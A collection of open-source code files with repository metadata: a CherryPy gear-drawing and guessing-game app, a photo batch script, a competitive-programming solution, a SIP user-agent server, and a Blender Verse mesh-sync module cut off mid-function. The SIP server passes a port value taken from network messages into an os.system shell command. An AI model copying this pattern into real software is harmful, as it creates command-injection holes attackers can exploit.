a=2*rp/n
# d 為齒根大小, 為模數的 1.157 或 1.25倍, 這裡採 1.25 倍
d=2.5*rp/n
# ra 為齒輪的外圍半徑
ra=rp+a
print("ra:", ra)
# 畫出 ra 圓, 畫圓函式尚未定義
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb 則為齒輪的基圓半徑
# 基圓為漸開線長齒之基準圓
rb=rp*cos(20*deg)
print("rp:", rp)
print("rb:", rb)
# 畫出 rb 圓 (基圓), 畫圓函式尚未定義
#create_oval(midx-rb, midy-rb, midx+rb, midy+rb, width=1)
# rd 為齒根圓半徑
rd=rp-d
# 當 rd 大於 rb 時
print("rd:", rd)
# 畫出 rd 圓 (齒根圓), 畫圓函式尚未定義
#create_oval(midx-rd, midy-rd, midx+rd, midy+rd, width=1)
# dr 則為基圓到齒頂圓半徑分成 imax 段後的每段半徑增量大小
# 將圓弧分成 imax 段來繪製漸開線
dr=(ra-rb)/imax
# tan(20*deg)-20*deg 為漸開線函數
sigma=pi/(2*n)+tan(20*deg)-20*deg
for j in range(n):
ang=-2.*j*pi/n+sigma
ang2=2.*j*pi/n+sigma
lxd=midx+rd*sin(ang2-2.*pi/n)
lyd=midy-rd*cos(ang2-2.*pi/n)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(alpha-ang)
ypt=r*cos(alpha-ang)
xd=rd*sin(-ang)
yd=rd*cos(-ang)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由左側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
lfx=midx+xpt
lfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# the line from last end of dedendum point to the recent
# end of dedendum point
# lxd 為齒根圓上的左側 x 座標, lyd 則為 y 座標
# 下列為齒根圓上用來近似圓弧的直線
create_line((lxd),(lyd),(midx+xd),(midy-yd),fill=顏色)
#for(i=0;i<=imax;i++):
for i in range(imax+1):
r=rb+i*dr
theta=sqrt((r*r)/(rb*rb)-1.)
alpha=theta-atan(theta)
xpt=r*sin(ang2-alpha)
ypt=r*cos(ang2-alpha)
xd=rd*sin(ang2)
yd=rd*cos(ang2)
# i=0 時, 繪線起點由齒根圓上的點, 作為起點
if(i==0):
last_x = midx+xd
last_y = midy-yd
# 由右側齒根圓作為起點, 除第一點 (xd,yd) 齒根圓上的起點外, 其餘的 (xpt,ypt)則為漸開線上的分段點
create_line((midx+xpt),(midy-ypt),(last_x),(last_y),fill=顏色)
# 最後一點, 則為齒頂圓
if(i==imax):
rfx=midx+xpt
rfy=midy-ypt
last_x = midx+xpt
last_y = midy-ypt
# lfx 為齒頂圓上的左側 x 座標, lfy 則為 y 座標
# 下列為齒頂圓上用來近似圓弧的直線
create_line(lfx,lfy,rfx,rfy,fill=顏色)
齒輪(400,400,300,41,"blue")
</script>
<canvas id="plotarea" width="800" height="800"></canvas>
</body>
</html>
'''
return outstring
#@+node:2014fall.20141215194146.1793: *3* doCheck
@cherrypy.expose
def doCheck(self, guess=None):
# 假如使用者直接執行 doCheck, 則設法轉回根方法
if guess is None:
raise cherrypy.HTTPRedirect("/")
# 從 session 取出 answer 對應資料, 且處理直接執行 doCheck 時無法取 session 值情況
try:
theanswer = int(cherrypy.session.get('answer'))
except:
raise cherrypy.HTTPRedirect("/")
# 經由表單所取得的 guess 資料型別為 string
try:
theguess = int(guess)
except:
return "error " + self.guessform()
# 每執行 doCheck 一次,次數增量一次
cherrypy.session['count'] += 1
# 答案與所猜數字進行比對
if theanswer < theguess:
return "big " + self.guessform()
elif theanswer > theguess:
return "small " + self.guessform()
else:
# 已經猜對, 從 session 取出累計猜測次數
thecount = cherrypy.session.get('count')
return "exact: <a href=''>再猜</a>"
#@+node:2014fall.20141215194146.1789: *3* guessform
def guessform(self):
# 印出讓使用者輸入的超文件表單
outstring = str(cherrypy.session.get('answer')) + "/" + str(cherrypy.session.get('count')) + '''<form method=POST action=doCheck>
請輸入您所猜的整數:<input type=text name=guess><br />
<input type=submit value=send>
</form>'''
return outstring
#@-others
#@-others
################# (4) 程式啟動區
# 配合程式檔案所在目錄設定靜態目錄或靜態檔案
application_conf = {'/static':{
'tools.staticdir.on': True,
# 程式執行目錄下, 必須自行建立 static 目錄
'tools.staticdir.dir': _curdir+"/static"},
'/downloads':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/downloads"},
'/images':{
'tools.staticdir.on': True,
'tools.staticdir.dir': data_dir+"/images"}
}
root = Hello()
root.gear = gear.Gear()
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示在 OpenSfhit 執行
application = cherrypy.Application(root, config=application_conf)
else:
# 表示在近端執行
cherrypy.quickstart(root, config=application_conf)
#@-leo
|
2014cdbg4/2015cd_midterm
|
wsgi.py
|
Python
|
gpl-2.0
| 26,299
|
## batchprocess.py
from modules.FileProcess import batchprocess
def _archlinux_():
# Source folder, this one will be walked recursively in search of your files
sInd = "/media/BLACK/Work/PersonalMedia/FotosWork/src"
# Target folder where the pictures will be copied, and renamed and organized.
# Current Pattern: ./[Year]/[Month]/[Day]/[Year-Month-Day]/[HH.MM.SS-Take-Camera].[ext]
sOutd = "/media/BLACK/Work/PersonalMedia/FotosWork/sources"
# This script doesn't remove any file, but the pictures that were copied right in target folder will be moved here.
# Files not in extensions list or already on Target Folder will be left in the source folder
sProcd = "/media/BLACK/Work/PersonalMedia/FotosWork/proc"
# list of search extensions.
lext = [".jpg",".jpeg",".jpe",".tif",".nef",".cr2",".psd",".png",".gif"]
# launch command
batchprocess(sInd,sOutd,sProcd,lext)
## test code
if __name__ == "__main__":
_archlinux_()
|
ridlimod/kndMediaOrganizer
|
src/batchprocess.py
|
Python
|
gpl-2.0
| 937
|
"""
2588 : 곱셈
URL : https://www.acmicpc.net/problem/2588
Input :
472
385
Output :
2360
3776
1416
181720
"""
first = int(input())
second = int(input())
print(first * (second % 10))
print(first * ((second % 100) // 10))
print(first * (second // 100))
print(first * second)
|
0x1306e6d/Baekjoon
|
baekjoon/2588.py
|
Python
|
gpl-2.0
| 340
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""USER AGENT SERVER."""
import socket
import socketserver
import sys
import os
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import time
"""READING AND EXTRACTION OF XML DATA."""
if len(sys.argv) != 2:
sys.exit("Usage: python uaserver.py config")
#FIRST PARAMETER : XML FILE
XML_DATA = sys.argv[1]
class SmallSMILHandler(ContentHandler):
"""CLASE DE LECTURA DE XML."""
def __init__(self):
"""Diccionario xml."""
self.list = []
self.dicc = {"account": ["username", "passwd"],
"uaserver": ["ip", "puerto"],
"rtpaudio": ["puerto"],
"regproxy": ["ip", "puerto"],
"log": ["path"],
"audio": ["path"]}
def startElement(self, name, attrib):
"""Start Element."""
if name in self.dicc:
dicc = {}
for item in self.dicc[name]:
dicc[item] = attrib.get(item, "")
diccname = {name: dicc}
self.list.append(diccname)
def get_tags(self):
"""Devuelve la lista xml."""
return self.list
parser = make_parser()
cHandler = SmallSMILHandler()
parser.setContentHandler(cHandler)
parser.parse(open(XML_DATA))
data = cHandler.get_tags()
print(data)
'DATOS'
#Vamos a probar a sacar algun dato del diccionario creado con los datos del xml
ACCOUNT = data[0]['account']
#print("Esto es account: ", ACCOUNT)
USERNAME = ACCOUNT['username']
#print("Esto es username:", USERNAME)
UASERVER_PORT = data[1]['uaserver']['puerto']
#print("Esto es el puerto de escucha del UAServer:", UASERVER_PORT)
UAS_IP = data[1]['uaserver']['ip']
#print("Esto es la direccion IP del UASERVER: ", UAS_IP)
RTP_PORT = data[2]['rtpaudio']['puerto']
SONG = data[5]['audio']['path']
LOG_FILE = data[4]['log']['path']
PROXY_PORT = data[3]['regproxy']['puerto']
PROXY_IP = data[3]['regproxy']['ip']
'''LOG'''
fichero = LOG_FILE
fich = open(fichero, 'a')
str_now = time.strftime("%Y%m%d%H%M%S", time.gmtime(time.time()))
class EchoHandler(socketserver.DatagramRequestHandler):
"""Echo."""
PORT_RTP = []
def handle(self):
u"""Escribe dirección y puerto cliente (tupla client_address)."""
while 1:
# Leyendo línea a línea lo que nos envía el cliente
text = self.rfile.read()
line = self.rfile.read()
print("Proxy manda cliente: ")
print(text.decode('utf-8'))
LINE = text.decode('utf-8')
REQUESTS = ['INVITE', 'ACK', 'BYE']
Words_LINES = LINE.split()
print("Esta es la linea que me envia el proxy", Words_LINES)
REQUEST = Words_LINES[0]
#PORT_RTP = []
if REQUEST == 'INVITE':
RTP_PORT_RECEIVE = Words_LINES[11]
self.PORT_RTP.append(RTP_PORT_RECEIVE)
#Hemos añadido el puerto a un diccionario
print("LISTA RECIEN INVENTADA", self.PORT_RTP)
print("Puerto RTP nos envia el cliente en INVITE: ")
print(RTP_PORT_RECEIVE)
if not REQUEST in REQUESTS:
LINE_405 = 'SIP/2.0 405 Method Not Allowed\r\n\r\n'
self.wfile.write(LINE_405)
if REQUEST == 'INVITE':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += self.client_address[0] + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
answer = "SIP/2.0 100 Trying\r\n\r\n"
answer += "SIP/2.0 180 Ring\r\n\r\n"
answer += "SIP/2.0 200 OK\r\n\r\n"
answer += "Content-Type: application/sdp\r\n\r\n"
answer += "v=0\r\n" + "o=" + USERNAME + " "
answer += UAS_IP + " \r\n" + "s=SesionGhibli\r\n"
answer += "t=0\r\n" + "m=audio " + RTP_PORT
answer += " RTP\r\n\r\n"
self.wfile.write(bytes(answer, 'utf-8'))
'''LOG'''
datos_log2 = str_now + " Sent to " + PROXY_IP + ":"
datos_log2 += PROXY_PORT + " "
datos_log2 += answer.replace("\r\n", " ") + "\r\n"
fich.write(datos_log2)
elif REQUEST == 'ACK':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += self.client_address[0] + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
#print("imprimiendo la lista inventada", self.PORT_RTP)
PUERTO = self.PORT_RTP[0]
print("Reproduciendo")
aEjecutar = './mp32rtp -i 127.0.0.1 -p ' + PUERTO + ' < '
aEjecutar += SONG
#aEjecutar = "./mp32rtp -i " + DIR_DEST + " -p " + PUERTO
#aEjecutar += " < " + SONG
os.system(aEjecutar)
print('End')
#print("ENVIANDO AUDIO RTP IMAGINARIO AL PUERTO: ", PUERTO)
elif REQUEST == 'BYE':
'''LOG'''
datos_log1 = str_now + " Received from "
datos_log1 += PROXY_IP + ":"
datos_log1 += str(self.client_address[1])
datos_log1 += " " + LINE.replace("\r\n", " ") + "\r\n"
fich.write(datos_log1)
self.wfile.write(b"SIP/2.0 200 OK\r\n\r\n")
'''LOG'''
datos_log2 = str_now + " Sent to "
datos_log2 += PROXY_IP + ":" + PROXY_PORT
datos_log2 += " " + "SIP/2.0 200 OK" + "\r\n"
fich.write(datos_log2)
# Si no hay más líneas salimos del bucle infinito
if not line:
break
if __name__ == "__main__":
# Creamos servidor de eco y escuchamos
serv = socketserver.UDPServer((UAS_IP, int(UASERVER_PORT)), EchoHandler)
print("Listening...")
try:
serv.serve_forever()
except KeyboardInterrupt:
print("Finalizado servidor")
|
isabelvillaruiz/ptavi-pfinal
|
uaserver.py
|
Python
|
gpl-2.0
| 6,607
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This module implements sharing Blender meshes at Verse server
"""
import bpy
import blf
import bgl
import mathutils
import bmesh
from bpy_extras.view3d_utils import location_3d_to_region_2d
import verse as vrs
from .vrsent import vrsent
from . import object3d
VERSE_MESH_CT = 126
LAYER_VERTEXES_CT = 0
LAYER_EDGES_CT = 1
LAYER_QUADS_CT = 2
class VerseVertices(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing position of vertexes
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_VERTEXES_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_REAL64,
count=3, custom_type=LAYER_VERTEXES_CT):
"""
Constructor of VerseVertices
"""
super(VerseVertices, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def b3d_vertex(self, item_id):
"""
This method tries to find Blender vertex in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender vertex at cache first
b3d_vert = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_vert = _bmesh.verts[item_id]
except IndexError:
# When vertex was not found in cache nor bmesh, then try to
# find it using loop over all vertices
id_layer = _bmesh.verts.layers.int.get('VertIDs')
for b3d_vert in _bmesh.verts:
verse_id = b3d_vert[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_vert
if verse_id == item_id:
return b3d_vert
return None
else:
# Update cache
self.id_cache[item_id] = b3d_vert
return b3d_vert
else:
return b3d_vert
def get_bmesh(self):
"""
This method tries to update reference on bmesh
"""
if self.node.bmesh is None:
self.node.bmesh = bmesh.new()
self.node.bmesh.from_mesh(self.node.mesh)
self.node.bm_from_edit_mesh = False
else:
try:
self.node.bmesh.verts
except ReferenceError:
self.node.bmesh = bmesh.new()
self.node.bmesh.from_mesh(self.node.mesh)
self.node.clear_ID_cache()
return self.node.bmesh
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
vert_layer = super(VerseVertices, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if vert_layer.node.locked_by_me is False:
_bmesh = vert_layer.get_bmesh()
b3d_vert = vert_layer.b3d_vertex(item_id)
# Try to update last vertex ID
if vert_layer.node.last_vert_ID is None or \
vert_layer.node.last_vert_ID < item_id:
vert_layer.node.last_vert_ID = item_id
if b3d_vert is not None:
# Update position
b3d_vert.co = mathutils.Vector(value)
else:
# When vertex was not found, then it is new vertex. Create it.
b3d_vert = _bmesh.verts.new(value)
vert_layer.id_cache[item_id] = b3d_vert
id_layer = _bmesh.verts.layers.int.get('VertIDs')
b3d_vert[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(vert_layer.node.mesh)
vert_layer.node.mesh.update()
return vert_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
vert_layer = super(VerseVertices, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if vert_layer.node.locked_by_me is False:
_bmesh = vert_layer.get_bmesh()
b3d_vert = vert_layer.b3d_vertex(item_id)
# Try to delete vertex
if b3d_vert is not None:
bmesh.ops.delete(_bmesh, geom=[b3d_vert], context=1)
vert_layer.id_cache.pop(item_id)
# Update Blender mesh
_bmesh.to_mesh(vert_layer.node.mesh)
vert_layer.node.mesh.update()
return vert_layer
class VerseEdges(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing edges (indexes to vertexes)
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_EDGES_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_UINT32,
count=2, custom_type=LAYER_EDGES_CT):
"""
Constructor of VerseEdges
"""
super(VerseEdges, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def b3d_edge(self, item_id):
"""
This method tries to find Blender edge in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender vertex at cache first
b3d_edge = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_edge = _bmesh.edges[item_id]
except IndexError:
# When edge was not found in cache nor bmesh, then try to
# find it using loop over all edges
id_layer = _bmesh.edges.layers.int.get('EdgeIDs')
for b3d_edge in _bmesh.edges:
verse_id = b3d_edge[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_edge
if verse_id == item_id:
return b3d_edge
return None
else:
# Update cache
self.id_cache[item_id] = b3d_edge
return b3d_edge
else:
return b3d_edge
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
edge_layer = super(VerseEdges, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if edge_layer.node.locked_by_me is False:
vert_layer = edge_layer.node.vertices
face_layer = edge_layer.node.quads
if edge_layer.node.bmesh is None:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
edge_layer.node.bm_from_edit_mesh = False
else:
try:
edge_layer.node.bmesh.edges
except ReferenceError:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = edge_layer.node.bmesh
b3d_edge = edge_layer.b3d_edge(item_id)
# Try to update last vertex ID
if edge_layer.node.last_edge_ID is None or \
edge_layer.node.last_edge_ID < item_id:
edge_layer.node.last_edge_ID = item_id
# Does edge with same id exist?
if b3d_edge is not None:
# Delete edge
try:
_bmesh.edges.remove(b3d_edge)
except ReferenceError:
# Edge was already removed
pass
# Create new edge
b3d_edge = _bmesh.edges.new([vert_layer.b3d_vertex(vert_id) for vert_id in value])
edge_layer.id_cache[item_id] = b3d_edge
id_layer = _bmesh.edges.layers.int.get('EdgeIDs')
b3d_edge[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(edge_layer.node.mesh)
edge_layer.node.mesh.update()
return edge_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
edge_layer = super(VerseEdges, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if edge_layer.node.locked_by_me is False:
vert_layer = edge_layer.node.vertices
face_layer = edge_layer.node.quads
if edge_layer.node.bmesh is None:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
edge_layer.node.bm_from_edit_mesh = False
else:
try:
edge_layer.node.bmesh.edges
except ReferenceError:
edge_layer.node.bmesh = bmesh.new()
edge_layer.node.bmesh.from_mesh(edge_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = edge_layer.node.bmesh
b3d_edge = edge_layer.b3d_edge(item_id)
# Try to update last vertex ID
if edge_layer.node.last_vert_ID is None or \
edge_layer.node.last_edge_ID < item_id:
edge_layer.node.last_edge_ID = item_id
if b3d_edge is not None:
# Delete edge
try:
_bmesh.edges.remove(b3d_edge)
except ReferenceError:
# Edge was already removed?
edge_layer.id_cache.pop(item_id)
else:
# Update Blender mesh
_bmesh.to_mesh(edge_layer.node.mesh)
edge_layer.node.mesh.update()
edge_layer.id_cache.pop(item_id)
return edge_layer
class VerseFaces(vrsent.VerseLayer):
"""
Custom VerseLayer subclass representing tessellated faces (indexes to vertexes).
Tessellated mesh contains only triangles and quads.
"""
node_custom_type = VERSE_MESH_CT
custom_type = LAYER_QUADS_CT
def __init__(self, node, parent_layer=None, layer_id=None, data_type=vrs.VALUE_TYPE_UINT32,
count=4, custom_type=LAYER_QUADS_CT):
"""
Constructor of VerseFaces
"""
super(VerseFaces, self).__init__(node, parent_layer, layer_id, data_type, count, custom_type)
self.id_cache = {}
def find_b3d_face(self, item_id):
"""
This method tries to find Blender vertex in bmesh and cache
"""
_bmesh = self.node.bmesh
try:
# Try to find blender face at cache first
b3d_face = self.id_cache[item_id]
except KeyError:
try:
# Then try to find it in bmesh at the index==item_id
b3d_face = _bmesh.faces[item_id]
except IndexError:
# When face was not found in cache nor bmesh, then try to
# find it using loop over all faces
id_layer = _bmesh.faces.layers.int.get('FaceIDs')
for b3d_face in _bmesh.faces:
verse_id = b3d_face[id_layer]
if verse_id != -1:
self.id_cache[item_id] = b3d_face
if verse_id == item_id:
return b3d_face
return None
else:
# Update cache
self.id_cache[item_id] = b3d_face
return b3d_face
else:
return b3d_face
@classmethod
def cb_receive_layer_set_value(cls, session, node_id, layer_id, item_id, value):
"""
This method is called, when new value of verse layer was set
"""
face_layer = super(VerseFaces, cls).cb_receive_layer_set_value(session, node_id, layer_id, item_id, value)
# Update mesh only in situation, when it was changed by someone else
if face_layer.node.locked_by_me is False:
vert_layer = face_layer.node.vertices
edge_layer = face_layer.node.edges
if face_layer.node.bmesh is None:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
face_layer.node.bm_from_edit_mesh = False
else:
try:
face_layer.node.bmesh.faces
except ReferenceError:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = face_layer.node.bmesh
b3d_face = face_layer.find_b3d_face(item_id)
# When face already exists, then remove the face
if b3d_face is not None:
try:
_bmesh.faces.remove(b3d_face)
except ReferenceError:
# Face was already removed
pass
# Add new one
if value[3] == 0:
b3d_face = _bmesh.faces.new([vert_layer.b3d_vertex(vert_id) for vert_id in value[0:3]])
else:
b3d_face = _bmesh.faces.new([vert_layer.b3d_vertex(vert_id) for vert_id in value])
# Try to update last face ID
if face_layer.node.last_face_ID is None or \
face_layer.node.last_face_ID < item_id:
face_layer.node.last_face_ID = item_id
face_layer.id_cache[item_id] = b3d_face
id_layer = _bmesh.faces.layers.int.get('FaceIDs')
b3d_face[id_layer] = item_id
# Update Blender mesh
_bmesh.to_mesh(face_layer.node.mesh)
face_layer.node.mesh.update()
return face_layer
@classmethod
def cb_receive_layer_unset_value(cls, session, node_id, layer_id, item_id):
"""
This method is called, when some vertex was deleted
"""
face_layer = super(VerseFaces, cls).cb_receive_layer_unset_value(session, node_id, layer_id, item_id)
# Update mesh only in situation, when it was changed by someone else
if face_layer.node.locked_by_me is False:
vert_layer = face_layer.node.vertices
edge_layer = face_layer.node.edges
if face_layer.node.bmesh is None:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
face_layer.node.bm_from_edit_mesh = False
else:
try:
face_layer.node.bmesh.faces
except ReferenceError:
face_layer.node.bmesh = bmesh.new()
face_layer.node.bmesh.from_mesh(face_layer.node.mesh)
vert_layer.id_cache = {}
edge_layer.id_cache = {}
face_layer.id_cache = {}
_bmesh = face_layer.node.bmesh
b3d_face = face_layer.find_b3d_face(item_id)
# Remove face
if b3d_face is not None:
try:
_bmesh.faces.remove(b3d_face)
except ReferenceError:
# Face was already removed
face_layer.id_cache.pop(item_id)
else:
# Update Blender mesh
_bmesh.to_mesh(face_layer.node.mesh)
face_layer.node.mesh.update()
# Update id_cache
face_layer.id_cache.pop(item_id)
return face_layer
class VerseMesh(vrsent.VerseNode):
"""
Custom VerseNode subclass representing Blender mesh data structure
"""
custom_type = VERSE_MESH_CT
def __init__(self, session, node_id=None, parent=None, user_id=None, custom_type=VERSE_MESH_CT,
mesh=None, autosubscribe=False):
"""
Constructor of VerseMesh
"""
super(VerseMesh, self).__init__(session, node_id, parent, user_id, custom_type)
self.mesh = mesh
self.vertices = VerseVertices(node=self)
self.edges = VerseEdges(node=self)
self.quads = VerseFaces(node=self)
self._autosubscribe = autosubscribe
self.bmesh = None
self.bm_from_edit_mesh = False
self.cache = None
self.last_vert_ID = None
self.last_edge_ID = None
self.last_face_ID = None
if self.mesh is not None:
# TODO: make following code working in edit mode too
self.mesh.update(calc_tessface=True)
self.bmesh = bmesh.new()
self.bmesh.from_mesh(self.mesh)
# TODO: do not do it in this way for huge mesh (do not send whole mesh), but use
# vrs.get to get free space in outgoing queue.
# Send all Vertices
for vert in mesh.vertices:
self.vertices.items[vert.index] = tuple(vert.co)
# Send all Edges
for edge in mesh.edges:
self.edges.items[edge.index] = (edge.vertices[0], edge.vertices[1])
# Send all Faces
for face in mesh.tessfaces:
if len(face.vertices) == 3:
self.quads.items[face.index] = (face.vertices[0], face.vertices[1], face.vertices[2], 0)
else:
self.quads.items[face.index] = tuple(vert for vert in face.vertices)
# Create blender layers storing Verse IDs of vertices, edges and faces
self.last_vert_ID = self.__create_bpy_layer_ids('verts', 'VertIDs')
self.last_edge_ID = self.__create_bpy_layer_ids('edges', 'EdgeIDs')
self.last_face_ID = self.__create_bpy_layer_ids('faces', 'FaceIDs')
# Safe blender layers containing IDs to original mesh
self.bmesh.to_mesh(self.mesh)
self.bmesh.free()
self.bmesh = None
def __create_bpy_layer_ids(self, elems_name, layer_name):
"""
This method create Blender layer storing IDs of vertices or edges or faces
:elems_name: this could be 'verts', 'edges' or 'faces'
"""
elems_iter = getattr(self.bmesh, elems_name)
lay = elems_iter.layers.int.new(layer_name)
lay.use_force_default = True
lay.default_value = -1
# Set values in layer
last_elem_id = None
for elem in elems_iter:
last_elem_id = elem.index
elem[lay] = elem.index
return last_elem_id
def get_verse_id_of_vertex(self, bpy_vert):
"""
Return ID of blender vertex at Verse server
"""
layer = self.bmesh.verts.layers.int.get('VertIDs')
return bpy_vert[layer]
def get_verse_id_of_edge(self, bpy_edge):
"""
Return ID of blender edge at Verse server
"""
layer = self.bmesh.edges.layers.int.get('EdgeIDs')
return bpy_edge[layer]
def get_verse_id_of_face(self, bpy_face):
"""
Return ID of blender face at Verse server
"""
layer = self.bmesh.faces.layers.int.get('FaceIDs')
return bpy_face[layer]
def __send_vertex_updates(self):
"""
Try to send updates of geometry and positions of vertices
"""
alive_verts = {}
# Go through bmesh and try to detect new positions of vertices,
# deleted vertices and newly created vertices
for b3d_vert in self.bmesh.verts:
verse_id = self.get_verse_id_of_vertex(b3d_vert)
# New vertex was created. Try to send it to Verse server, store it in cache and save verse ID
if verse_id == -1:
# Update the last vertex ID
self.last_vert_ID += 1
verse_id = self.last_vert_ID
# Send new vertex position to Verse server
self.vertices.items[verse_id] = tuple(b3d_vert.co)
# Store verse vertex ID in bmesh layer
layer = self.bmesh.verts.layers.int.get('VertIDs')
b3d_vert[layer] = verse_id
# Position of vertex was changed?
elif self.vertices.items[verse_id] != tuple(b3d_vert.co):
# This will send updated position of vertex
self.vertices.items[verse_id] = tuple(b3d_vert.co)
# Mark vertex as alive
alive_verts[verse_id] = b3d_vert.index
# Try to find deleted vertices
rem_verts = [vert_id for vert_id in self.vertices.items.keys() if vert_id not in alive_verts]
# This will send unset commands for deleted vertices
for vert_id in rem_verts:
self.vertices.items.pop(vert_id)
if vert_id in self.vertices.id_cache:
self.vertices.id_cache.pop(vert_id)
def __send_edge_updates(self):
"""
Try to send updates of topology (edges)
"""
alive_edges = {}
# Go through bmesh and try to detect changes in edges (new created edges or deleted edges)
for b3d_edge in self.bmesh.edges:
verse_id = self.get_verse_id_of_edge(b3d_edge)
# New edge was created. Try to send it to Verse server
if verse_id == -1:
self.last_edge_ID += 1
verse_id = self.last_edge_ID
# Send new edge to Verse server
self.edges.items[verse_id] = (
self.get_verse_id_of_vertex(b3d_edge.verts[0]),
self.get_verse_id_of_vertex(b3d_edge.verts[1])
)
# Store edge ID in bmesh layer
layer = self.bmesh.edges.layers.int.get('EdgeIDs')
b3d_edge[layer] = verse_id
else:
# Was edge changed?
edge = (
self.get_verse_id_of_vertex(b3d_edge.verts[0]),
self.get_verse_id_of_vertex(b3d_edge.verts[1])
)
if self.edges.items[verse_id] != edge:
self.edges.items[verse_id] = edge
alive_edges[verse_id] = b3d_edge.index
# Try to find deleted edges
rem_edges = [edge_id for edge_id in self.edges.items.keys() if edge_id not in alive_edges]
# This will send unset commands for deleted edges
for edge_id in rem_edges:
self.edges.items.pop(edge_id)
if edge_id in self.edges.id_cache:
self.edges.id_cache.pop(edge_id)
def __send_face_updates(self):
"""
Try to send updates of topology (faces)
"""
def b3d_face_to_tuple(_b3d_face):
_face = None
if len(_b3d_face.verts) == 3:
_face = (
self.get_verse_id_of_vertex(_b3d_face.verts[0]),
self.get_verse_id_of_vertex(_b3d_face.verts[1]),
self.get_verse_id_of_vertex(_b3d_face.verts[2]),
0
)
elif len(b3d_face.verts) == 4:
_face = tuple(self.get_verse_id_of_vertex(vert) for vert in _b3d_face.verts)
# The last item of tuple can not be zero, because it indicates triangle.
if _face[3] == 0:
# Rotate the face to get zero to the beginning of the tuple
_face = (_face[3], _face[0], _face[1], _face[2])
else:
# TODO: tesselate face
print('Error: Face with more than 4 vertices is not supported')
return _face
alive_faces = {}
# Go through bmesh faces and try to detect changes (newly created)
for b3d_face in self.bmesh.faces:
verse_id = self.get_verse_id_of_face(b3d_face)
# New face was created. Try to send it to Verse server
if verse_id == -1:
self.last_face_ID += 1
verse_id = self.last_face_ID
self.quads.items[verse_id] = b3d_face_to_tuple(b3d_face)
# Store face ID in bmesh layer
layer = self.bmesh.faces.layers.int.get('FaceIDs')
